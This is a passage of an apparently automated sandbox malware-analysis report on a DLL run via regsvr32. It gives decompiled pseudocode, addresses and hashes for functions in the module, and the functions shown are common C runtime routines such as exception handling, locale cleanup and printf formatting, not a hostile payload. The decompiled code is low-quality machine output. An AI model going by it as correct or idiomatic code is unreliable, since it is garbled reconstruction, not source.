				if (E00007FFA7FFA5247FD70( *((intOrPtr*)( *0x5248d500 + _v20 * 8))) != 0xffffffff) goto 0x52480024;
				_v16 = 0xffffffff;
				E00007FFA7FFA5247AF60(_v20,  *((intOrPtr*)( *0x5248d500 + _v20 * 8)));
				goto L1;
				__ecx = 1;
				__eax = E00007FFA7FFA52469360(__eax, 1);
				if (_a8 != 1) goto 0x5248005b;
				__eax = _v24;
				goto 0x5248005f;
				__eax = _v16;
				return _v16;
			}






                                                                                0x7ffa5247ff00
                                                                                0x7ffa5247ff08
                                                                                0x7ffa5247ff10
                                                                                0x7ffa5247ff1d
                                                                                0x7ffa5247ff23
                                                                                0x7ffa5247ff33
                                                                                0x7ffa5247ff41
                                                                                0x7ffa5247ff58
                                                                                0x7ffa5247ff78
                                                                                0x7ffa5247ff92
                                                                                0x7ffa5247ffb2
                                                                                0x7ffa5247ffb9
                                                                                0x7ffa5247ffd3
                                                                                0x7ffa5247ffdb
                                                                                0x7ffa5247ffdf
                                                                                0x7ffa5247ffe6
                                                                                0x7ffa52480000
                                                                                0x7ffa5248001a
                                                                                0x7ffa5248001c
                                                                                0x7ffa52480038
                                                                                0x7ffa5248003d
                                                                                0x7ffa52480042
                                                                                0x7ffa52480047
                                                                                0x7ffa52480051
                                                                                0x7ffa52480053
                                                                                0x7ffa52480059
                                                                                0x7ffa5248005b
                                                                                0x7ffa52480063

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: _fflush_nolock$_lock_file2_unlock_unlock_file2
                                                                                • String ID:
                                                                                • API String ID: 1144694634-0
                                                                                • Opcode ID: 9c48fc7a63950d59b547df98b2f037ee7aefe6eda58a35de18d9feeb54d081ae
                                                                                • Instruction ID: a4bcb9c9b491f17eba209ffc94d4af3ceee23d9adc6a7ac84dae6665177df253
                                                                                • Opcode Fuzzy Hash: 9c48fc7a63950d59b547df98b2f037ee7aefe6eda58a35de18d9feeb54d081ae
                                                                                • Instruction Fuzzy Hash: 5C410536928901D5DB30DF19E88163973F0FB8AB58F184236E66D877A9CF7DD941CA00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA52473CC0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 186COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 27%
                                                                                			E00007FFA7FFA52473CC0(void* __edx, void* __rax, long long __rcx, long long __rdx, long long __r8, long long __r9, void* _a8, long long _a16, long long _a24, long long _a32, signed int* _a40, char _a48, signed int _a56, signed int _a64) {
				long long _v16;
				long long _v24;
				intOrPtr _v32;
				long long _v40;
				long long _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				signed int _v64;
				long long _v72;
				char _v80;
				long long _v88;
				void* _t135;
				void* _t145;
				void* _t147;
				void* _t148;
				void* _t149;
				signed int* _t200;
				intOrPtr _t206;

				_a32 = __r9;
				_a24 = __r8;
				_a16 = __rdx;
				_a8 = __rcx;
				0x52464000();
				if ( *((intOrPtr*)(__rax + 0x2c0)) != 0) goto 0x52473d6c;
				if ( *_a8 == 0xe06d7363) goto 0x52473d6c;
				if ( *_a8 != 0x80000029) goto 0x52473d2a;
				if ( *((intOrPtr*)(_a8 + 0x18)) != 0xf) goto 0x52473d2a;
				if ( *((long long*)(_a8 + 0x60)) == 0x19930520) goto 0x52473d6c;
				if ( *_a8 == 0x80000026) goto 0x52473d6c;
				if (( *_a40 & 0x1fffffff) - 0x19930522 < 0) goto 0x52473d6c;
				if ((_a40[9] & 0x00000001) == 0) goto 0x52473d6c;
				goto 0x5247409c;
				if (( *(_a8 + 4) & 0x00000066) == 0) goto 0x52473ef3;
				if (_a40[1] == 0) goto 0x52473ee4;
				if (_a48 != 0) goto 0x52473ee4;
				if (( *(_a8 + 4) & 0x00000020) == 0) goto 0x52473e40;
				if ( *_a8 != 0x80000026) goto 0x52473e40;
				_v56 = E00007FFA7FFA52473A60(_a24, _a40, _a32,  *((intOrPtr*)(_a24 + 0xf8)));
				if (_v56 - 0xffffffff < 0) goto 0x52473e0a;
				if (_v56 - _a40[1] >= 0) goto 0x52473e0a;
				goto 0x52473e0f;
				E00007FFA7FFA5246CF80(_a40);
				r9d = _v56;
				E00007FFA7FFA52474F20(_a40, _a16, _a32, _a40);
				goto 0x52473ec7;
				if (( *(_a8 + 4) & 0x00000020) == 0) goto 0x52473ec7;
				if ( *_a8 != 0x80000029) goto 0x52473ec7;
				_v48 = _a8;
				_v52 =  *((intOrPtr*)(_v48 + 0x38));
				if (_v52 - 0xffffffff < 0) goto 0x52473e95;
				if (_v52 - _a40[1] >= 0) goto 0x52473e95;
				goto 0x52473e9a;
				E00007FFA7FFA5246CF80(_a40);
				r9d = _v52;
				E00007FFA7FFA52474F20(_v48,  *((intOrPtr*)(_v48 + 0x28)), _a32, _a40);
				goto 0x5247409c;
				E00007FFA7FFA5246E790(_v52 - _a40[1], _v48, _a16, _a32, _a40);
				goto 0x52474097;
				if (_a40[3] != 0) goto 0x52473f59;
				if (( *_a40 & 0x1fffffff) - 0x19930521 < 0) goto 0x52474097;
				_t200 = _a40;
				if ( *((intOrPtr*)(_t200 + 0x20)) == 0) goto 0x52473f44;
				_t135 = E00007FFA7FFA5246E680( *_a40 & 0x1fffffff, _t200);
				_v24 = _t200 + _a40[8];
				goto 0x52473f4d;
				_v24 = 0;
				if (_v24 == 0) goto 0x52474097;
				if ( *_a8 != 0xe06d7363) goto 0x52474041;
				if ( *((intOrPtr*)(_a8 + 0x18)) - 3 < 0) goto 0x52474041;
				if ( *((intOrPtr*)(_a8 + 0x20)) - 0x19930522 <= 0) goto 0x52474041;
				_t206 =  *((intOrPtr*)(_a8 + 0x30));
				if ( *((intOrPtr*)(_t206 + 8)) == 0) goto 0x52473fc5;
				E00007FFA7FFA5246E6A0(_t135, _t206);
				_v16 = _t206 +  *((intOrPtr*)( *((intOrPtr*)(_a8 + 0x30)) + 8));
				goto 0x52473fce;
				_v16 = 0;
				_v40 = _v16;
				_t177 = _v40;
				if (_v40 == 0) goto 0x52474041;
				_v64 = _a64 & 0x000000ff;
				_v72 = _a56;
				_v80 = _a48;
				_v88 = _a40;
				_v32 = _v40();
				goto 0x52474097;
				_v64 = _a56;
				_v72 = _a48;
				_v80 = _a64 & 0x000000ff;
				_v88 = _a40;
				E00007FFA7FFA524740B0(_t145, _t147, _t148, _t149, _t177, _a40, _a8, _a16, _a24, _a32);
				return 1;
			}





















                                                                                0x7ffa52473cc0
                                                                                0x7ffa52473cc5
                                                                                0x7ffa52473cca
                                                                                0x7ffa52473ccf
                                                                                0x7ffa52473cd8
                                                                                0x7ffa52473ce4
                                                                                0x7ffa52473cf8
                                                                                0x7ffa52473d08
                                                                                0x7ffa52473d16
                                                                                0x7ffa52473d28
                                                                                0x7ffa52473d38
                                                                                0x7ffa52473d4e
                                                                                0x7ffa52473d60
                                                                                0x7ffa52473d67
                                                                                0x7ffa52473d7c
                                                                                0x7ffa52473d8e
                                                                                0x7ffa52473d9c
                                                                                0x7ffa52473db2
                                                                                0x7ffa52473dc6
                                                                                0x7ffa52473dec
                                                                                0x7ffa52473df5
                                                                                0x7ffa52473e06
                                                                                0x7ffa52473e08
                                                                                0x7ffa52473e0a
                                                                                0x7ffa52473e0f
                                                                                0x7ffa52473e2c
                                                                                0x7ffa52473e3b
                                                                                0x7ffa52473e50
                                                                                0x7ffa52473e60
                                                                                0x7ffa52473e6a
                                                                                0x7ffa52473e77
                                                                                0x7ffa52473e80
                                                                                0x7ffa52473e91
                                                                                0x7ffa52473e93
                                                                                0x7ffa52473e95
                                                                                0x7ffa52473e9a
                                                                                0x7ffa52473eb8
                                                                                0x7ffa52473ec2
                                                                                0x7ffa52473edf
                                                                                0x7ffa52473eee
                                                                                0x7ffa52473eff
                                                                                0x7ffa52473f15
                                                                                0x7ffa52473f1b
                                                                                0x7ffa52473f27
                                                                                0x7ffa52473f29
                                                                                0x7ffa52473f3d
                                                                                0x7ffa52473f42
                                                                                0x7ffa52473f44
                                                                                0x7ffa52473f53
                                                                                0x7ffa52473f67
                                                                                0x7ffa52473f79
                                                                                0x7ffa52473f8e
                                                                                0x7ffa52473f9c
                                                                                0x7ffa52473fa4
                                                                                0x7ffa52473fa6
                                                                                0x7ffa52473fbe
                                                                                0x7ffa52473fc3
                                                                                0x7ffa52473fc5
                                                                                0x7ffa52473fd3
                                                                                0x7ffa52473fd8
                                                                                0x7ffa52473fde
                                                                                0x7ffa52473fe8
                                                                                0x7ffa52473ff4
                                                                                0x7ffa52474000
                                                                                0x7ffa5247400c
                                                                                0x7ffa52474035
                                                                                0x7ffa5247403f
                                                                                0x7ffa52474049
                                                                                0x7ffa52474055
                                                                                0x7ffa52474061
                                                                                0x7ffa5247406d
                                                                                0x7ffa52474092
                                                                                0x7ffa524740a0

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: _inconsistency
                                                                                • String ID: csm$csm
                                                                                • API String ID: 32975420-3733052814
                                                                                • Opcode ID: b62b0453fdffd86c1ea8e56b24d9441da31a01f9fe07ee07632383c0adf59322
                                                                                • Instruction ID: cc5862943c7cde91c1b94dcf80f3e0e67201cc3c4a68e605b82c0242472d687d
                                                                                • Opcode Fuzzy Hash: b62b0453fdffd86c1ea8e56b24d9441da31a01f9fe07ee07632383c0adf59322
                                                                                • Instruction Fuzzy Hash: CDA1FA366087C5C6DB708B15E4443AABBB0F786B94F588026EADD87B99CF7CD445CB40
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA52469640 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 182COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                • f:\dd\vctools\crt_bld\self_64_amd64\crt\src\localref.c, xrefs: 00007FFA52469932
                                                                                • ((ptloci->lc_category[category].wlocale != NULL) && (ptloci->lc_category[category].wrefcount != NULL)) || ((ptloci->lc_category[ca, xrefs: 00007FFA5246991D
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: __free_lconv_mon__free_lconv_num
                                                                                • String ID: ((ptloci->lc_category[category].wlocale != NULL) && (ptloci->lc_category[category].wrefcount != NULL)) || ((ptloci->lc_category[ca$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\localref.c
                                                                                • API String ID: 2148069796-2706031433
                                                                                • Opcode ID: 5530c5148454f32ed92c453347a6e128a1bc42f7b71ac9e6bc1d50a4750a2989
                                                                                • Instruction ID: 46953ce5f81f6f5705f7853f8b07a31c46d718a7688665a949950b2c7fcf8bd8
                                                                                • Opcode Fuzzy Hash: 5530c5148454f32ed92c453347a6e128a1bc42f7b71ac9e6bc1d50a4750a2989
                                                                                • Instruction Fuzzy Hash: 13A1D932618A8581EB509B45E4C53BEA3B1F7C5B50F499436EA8E4B7A9CFFCE485C700
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA52472772 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 166COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter
                                                                                • String ID: ("Buffer too small", 0)$_vsnprintf_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\vsprintf.c
                                                                                • API String ID: 2123368286-3717698799
                                                                                • Opcode ID: 1aafbfe16f86ccf21253850ca152cd04a8ee8357f57b5e583563c43112fb4b7a
                                                                                • Instruction ID: b1bc80c2222c99ec7391c33132b24cc28a21d6ccace8292ddcc0981130d1fc69
                                                                                • Opcode Fuzzy Hash: 1aafbfe16f86ccf21253850ca152cd04a8ee8357f57b5e583563c43112fb4b7a
                                                                                • Instruction Fuzzy Hash: F181DD31A1DA8686DA70CB65E84436A63F0F786764F188235E6BD437DDDFBCE4468B00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA5247C719 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 93COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 20%
                                                                                			E00007FFA7FFA5247C719(signed int __rax, void* __rdx, long long _a32, void* _a64, void* _a72, intOrPtr _a76, signed int _a80, char _a84, char _a85, intOrPtr _a88, long long _a92, long long _a96, signed char _a104, intOrPtr _a108, signed int _a116, char _a120, char _a687, char _a688, intOrPtr _a704, intOrPtr _a708, signed char _a816, signed int _a824, signed int _a832, intOrPtr _a840, signed short* _a848, signed char _a856, char _a860, char _a864, long long _a872, intOrPtr _a876, intOrPtr _a912, intOrPtr _a916, signed int _a1040, long long _a1048, signed short _a1056, long long _a1060, signed int _a1064, intOrPtr _a1088, char _a1112) {
				signed int _t212;
				signed char _t217;
				intOrPtr _t252;
				signed int _t327;
				signed int _t328;
				signed long long _t331;
				intOrPtr* _t354;
				signed long long _t379;

				_t327 = __rax;
				_a708 = 0x27;
				_a72 = 0x10;
				if ((_a80 & 0x00000080) == 0) goto 0x5247c754;
				_a84 = 0x30;
				_a85 = _a708 + 0x51;
				_a92 = 2;
				_a72 = 8;
				if ((_a80 & 0x00000080) == 0) goto 0x5247c777;
				asm("bts eax, 0x9");
				if ((_a80 & 0x00008000) == 0) goto 0x5247c79e;
				E00007FFA7FFA52471EA0( &_a1112);
				_a824 = _t327;
				goto 0x5247c84b;
				if ((_a80 & 0x00001000) == 0) goto 0x5247c7c5;
				E00007FFA7FFA52471EA0( &_a1112);
				_a824 = _t327;
				goto 0x5247c84b;
				if ((_a80 & 0x00000020) == 0) goto 0x5247c810;
				if ((_a80 & 0x00000040) == 0) goto 0x5247c7f6;
				_t328 = E00007FFA7FFA52471E40( &_a1112);
				_a824 = _t328;
				goto 0x5247c80e;
				E00007FFA7FFA52471E40( &_a1112);
				_a824 = _t328;
				goto 0x5247c84b;
				if ((_a80 & 0x00000040) == 0) goto 0x5247c834;
				E00007FFA7FFA52471E40( &_a1112);
				_a824 = _t328;
				goto 0x5247c84b;
				E00007FFA7FFA52471E40( &_a1112);
				_a824 = _t328;
				if ((_a80 & 0x00000040) == 0) goto 0x5247c882;
				if (_a824 >= 0) goto 0x5247c882;
				_a832 =  ~_a824;
				asm("bts eax, 0x8");
				goto 0x5247c892;
				_t331 = _a824;
				_a832 = _t331;
				if ((_a80 & 0x00008000) != 0) goto 0x5247c8c7;
				if ((_a80 & 0x00001000) != 0) goto 0x5247c8c7;
				_a832 = _a832 & _t331;
				if (_a116 >= 0) goto 0x5247c8d8;
				_a116 = 1;
				goto 0x5247c8f5;
				_a80 = _a80 & 0xfffffff7;
				if (_a116 - 0x200 <= 0) goto 0x5247c8f5;
				_a116 = 0x200;
				if (_a832 != 0) goto 0x5247c908;
				_a92 = 0;
				_a64 =  &_a687;
				_t212 = _a116;
				_a116 = _a116 - 1;
				if (_t212 > 0) goto 0x5247c936;
				if (_a832 == 0) goto 0x5247c9d3;
				_a1040 = _a72;
				_a816 = _t212 / _a1040 + 0x30;
				_a1048 = _a72;
				if (_a816 - 0x39 <= 0) goto 0x5247c9b2;
				_t217 = _a816 + _a708;
				_a816 = _t217;
				 *_a64 = _a816 & 0x000000ff;
				_a64 = _a64 - 1;
				goto 0x5247c915;
				_a104 = _t217;
				_a64 = _a64 + 1;
				if ((_a80 & 0x00000200) == 0) goto 0x5247ca31;
				if (_a104 == 0) goto 0x5247ca12;
				if ( *_a64 == 0x30) goto 0x5247ca31;
				_a64 = _a64 - 1;
				 *_a64 = 0x30;
				_a104 = _a104 + 1;
				if (_a108 != 0) goto 0x5247cc6e;
				if ((_a80 & 0x00000040) == 0) goto 0x5247ca95;
				if ((_a80 & 0x00000100) == 0) goto 0x5247ca63;
				_a84 = 0x2d;
				_a92 = 1;
				goto 0x5247ca95;
				if ((_a80 & 0x00000001) == 0) goto 0x5247ca7d;
				_a84 = 0x2b;
				_a92 = 1;
				goto 0x5247ca95;
				if ((_a80 & 0x00000002) == 0) goto 0x5247ca95;
				_a84 = 0x20;
				_a92 = 1;
				_a840 = _a88 - _a104 - _a92;
				if ((_a80 & 0x0000000c) != 0) goto 0x5247cad5;
				E00007FFA7FFA5247CF10(0x20, _a840, _a1088,  &_a688);
				E00007FFA7FFA5247CF60(_a92, _a64,  &_a84, _a1088,  &_a688);
				if ((_a80 & 0x00000008) == 0) goto 0x5247cb27;
				if ((_a80 & 0x00000004) != 0) goto 0x5247cb27;
				E00007FFA7FFA5247CF10(0x30, _a840, _a1088,  &_a688);
				if (_a76 == 0) goto 0x5247cc1d;
				if (_a104 <= 0) goto 0x5247cc1d;
				_a872 = 0;
				_a848 = _a64;
				_a856 = _a104;
				_a856 = _a856 - 1;
				if (_a856 == 0) goto 0x5247cc1b;
				_a1056 =  *_a848 & 0x0000ffff;
				r9d = _a1056 & 0x0000ffff;
				r8d = 6;
				_a872 = E00007FFA7FFA5247B530( &_a860,  &_a864, _a1088);
				_a848 =  &(_a848[1]);
				if (_a872 != 0) goto 0x5247cbe5;
				if (_a860 != 0) goto 0x5247cbf2;
				_a688 = 0xffffffff;
				goto 0x5247cc1b;
				E00007FFA7FFA5247CF60(_a860,  &(_a848[1]),  &_a864, _a1088,  &_a688);
				goto 0x5247cb60;
				goto 0x5247cc3b;
				E00007FFA7FFA5247CF60(_a104,  &(_a848[1]), _a64, _a1088,  &_a688);
				if (_a688 < 0) goto 0x5247cc6e;
				if ((_a80 & 0x00000004) == 0) goto 0x5247cc6e;
				E00007FFA7FFA5247CF10(0x20, _a840, _a1088,  &_a688);
				if (_a96 == 0) goto 0x5247cc8e;
				0x52465330();
				_a96 = 0;
				goto 0x5247b99c;
				if (_a704 == 0) goto 0x5247ccb4;
				if (_a704 == 7) goto 0x5247ccb4;
				_a1060 = 0;
				goto 0x5247ccbf;
				_a1060 = 1;
				_t252 = _a1060;
				_a876 = _t252;
				if (_a876 != 0) goto 0x5247cd05;
				_t354 = L"((state == ST_NORMAL) || (state == ST_TYPE))";
				_a32 = _t354;
				r9d = 0;
				r8d = 0x8f5;
				0x5246b3b0();
				if (_t252 != 1) goto 0x5247cd05;
				asm("int3");
				if (_a876 != 0) goto 0x5247cd61;
				0x5246ab30();
				 *_t354 = 0x16;
				_a32 = 0;
				r9d = 0x8f5;
				E00007FFA7FFA5246BD70(L"((state == ST_NORMAL) || (state == ST_TYPE))", L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_64_amd64\\crt\\src\\output.c");
				_a912 = 0xffffffff;
				E00007FFA7FFA52466800( &_a120);
				goto 0x5247cd80;
				_a916 = _a688;
				E00007FFA7FFA52466800( &_a120);
				return E00007FFA7FFA52463280(_a916, 2, 2, _a1064 ^ _t379, L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_64_amd64\\crt\\src\\output.c");
			}











                                                                                0x7ffa5247c719
                                                                                0x7ffa5247c719
                                                                                0x7ffa5247c724
                                                                                0x7ffa5247c737
                                                                                0x7ffa5247c739
                                                                                0x7ffa5247c748
                                                                                0x7ffa5247c74c
                                                                                0x7ffa5247c756
                                                                                0x7ffa5247c769
                                                                                0x7ffa5247c76f
                                                                                0x7ffa5247c782
                                                                                0x7ffa5247c78c
                                                                                0x7ffa5247c791
                                                                                0x7ffa5247c799
                                                                                0x7ffa5247c7a9
                                                                                0x7ffa5247c7b3
                                                                                0x7ffa5247c7b8
                                                                                0x7ffa5247c7c0
                                                                                0x7ffa5247c7ce
                                                                                0x7ffa5247c7d9
                                                                                0x7ffa5247c7e8
                                                                                0x7ffa5247c7ec
                                                                                0x7ffa5247c7f4
                                                                                0x7ffa5247c7fe
                                                                                0x7ffa5247c806
                                                                                0x7ffa5247c80e
                                                                                0x7ffa5247c819
                                                                                0x7ffa5247c823
                                                                                0x7ffa5247c82a
                                                                                0x7ffa5247c832
                                                                                0x7ffa5247c83c
                                                                                0x7ffa5247c843
                                                                                0x7ffa5247c854
                                                                                0x7ffa5247c85f
                                                                                0x7ffa5247c86c
                                                                                0x7ffa5247c878
                                                                                0x7ffa5247c880
                                                                                0x7ffa5247c882
                                                                                0x7ffa5247c88a
                                                                                0x7ffa5247c89d
                                                                                0x7ffa5247c8aa
                                                                                0x7ffa5247c8bf
                                                                                0x7ffa5247c8cc
                                                                                0x7ffa5247c8ce
                                                                                0x7ffa5247c8d6
                                                                                0x7ffa5247c8df
                                                                                0x7ffa5247c8eb
                                                                                0x7ffa5247c8ed
                                                                                0x7ffa5247c8fe
                                                                                0x7ffa5247c900
                                                                                0x7ffa5247c910
                                                                                0x7ffa5247c915
                                                                                0x7ffa5247c91f
                                                                                0x7ffa5247c925
                                                                                0x7ffa5247c930
                                                                                0x7ffa5247c93b
                                                                                0x7ffa5247c95e
                                                                                0x7ffa5247c96a
                                                                                0x7ffa5247c997
                                                                                0x7ffa5247c9a9
                                                                                0x7ffa5247c9ab
                                                                                0x7ffa5247c9bf
                                                                                0x7ffa5247c9c9
                                                                                0x7ffa5247c9ce
                                                                                0x7ffa5247c9e0
                                                                                0x7ffa5247c9ec
                                                                                0x7ffa5247c9fc
                                                                                0x7ffa5247ca03
                                                                                0x7ffa5247ca10
                                                                                0x7ffa5247ca1a
                                                                                0x7ffa5247ca24
                                                                                0x7ffa5247ca2d
                                                                                0x7ffa5247ca36
                                                                                0x7ffa5247ca45
                                                                                0x7ffa5247ca52
                                                                                0x7ffa5247ca54
                                                                                0x7ffa5247ca59
                                                                                0x7ffa5247ca61
                                                                                0x7ffa5247ca6c
                                                                                0x7ffa5247ca6e
                                                                                0x7ffa5247ca73
                                                                                0x7ffa5247ca7b
                                                                                0x7ffa5247ca86
                                                                                0x7ffa5247ca88
                                                                                0x7ffa5247ca8d
                                                                                0x7ffa5247caa5
                                                                                0x7ffa5247cab5
                                                                                0x7ffa5247cad0
                                                                                0x7ffa5247caee
                                                                                0x7ffa5247cafc
                                                                                0x7ffa5247cb07
                                                                                0x7ffa5247cb22
                                                                                0x7ffa5247cb2c
                                                                                0x7ffa5247cb37
                                                                                0x7ffa5247cb3d
                                                                                0x7ffa5247cb4d
                                                                                0x7ffa5247cb59
                                                                                0x7ffa5247cb70
                                                                                0x7ffa5247cb79
                                                                                0x7ffa5247cb8a
                                                                                0x7ffa5247cb92
                                                                                0x7ffa5247cb9b
                                                                                0x7ffa5247cbb6
                                                                                0x7ffa5247cbc9
                                                                                0x7ffa5247cbd9
                                                                                0x7ffa5247cbe3
                                                                                0x7ffa5247cbe5
                                                                                0x7ffa5247cbf0
                                                                                0x7ffa5247cc11
                                                                                0x7ffa5247cc16
                                                                                0x7ffa5247cc1b
                                                                                0x7ffa5247cc36
                                                                                0x7ffa5247cc43
                                                                                0x7ffa5247cc4e
                                                                                0x7ffa5247cc69
                                                                                0x7ffa5247cc74
                                                                                0x7ffa5247cc80
                                                                                0x7ffa5247cc85
                                                                                0x7ffa5247cc8e
                                                                                0x7ffa5247cc9b
                                                                                0x7ffa5247cca5
                                                                                0x7ffa5247cca7
                                                                                0x7ffa5247ccb2
                                                                                0x7ffa5247ccb4
                                                                                0x7ffa5247ccbf
                                                                                0x7ffa5247ccc6
                                                                                0x7ffa5247ccd5
                                                                                0x7ffa5247ccd7
                                                                                0x7ffa5247ccde
                                                                                0x7ffa5247cce3
                                                                                0x7ffa5247cce6
                                                                                0x7ffa5247ccf8
                                                                                0x7ffa5247cd00
                                                                                0x7ffa5247cd02
                                                                                0x7ffa5247cd0d
                                                                                0x7ffa5247cd0f
                                                                                0x7ffa5247cd14
                                                                                0x7ffa5247cd1a
                                                                                0x7ffa5247cd23
                                                                                0x7ffa5247cd3e
                                                                                0x7ffa5247cd43
                                                                                0x7ffa5247cd53
                                                                                0x7ffa5247cd5f
                                                                                0x7ffa5247cd68
                                                                                0x7ffa5247cd74
                                                                                0x7ffa5247cd97

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: get_int64_arg
                                                                                • String ID: '$0$9
                                                                                • API String ID: 1967237116-269856862
                                                                                • Opcode ID: 83c439eea7fc9ce93bcb821b911d608e7d80de2d13083439c5735137d4fc31ad
                                                                                • Instruction ID: e2ffad667954e126b0ffdd340e1e5a25d65d689b8f33870ee360e5887a3f39d0
                                                                                • Opcode Fuzzy Hash: 83c439eea7fc9ce93bcb821b911d608e7d80de2d13083439c5735137d4fc31ad
                                                                                • Instruction Fuzzy Hash: FB41E03360DAC18BE7758B19E8813AAB7F4F786750F084125E69C86B88DBBCD545CF00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA52475260 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 93COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: Frame$CreateDestroyedExceptionFindInfoObjectUnlink
                                                                                • String ID: csm
                                                                                • API String ID: 2005287440-1018135373
                                                                                • Opcode ID: 4c556ceed80f2aba1954f9041ed191ad0fbab56fa1f8ad9f2457e70616e7d401
                                                                                • Instruction ID: 999d7adaae9ad36ce51767adbaa32fdcce5f0dcb63e0fbeab0474242333e5475
                                                                                • Opcode Fuzzy Hash: 4c556ceed80f2aba1954f9041ed191ad0fbab56fa1f8ad9f2457e70616e7d401
                                                                                • Instruction Fuzzy Hash: 8B511736608B8682DA609F19F48036EB7F0F7C6B94F188135EA9D07BA9DF79D441CB40
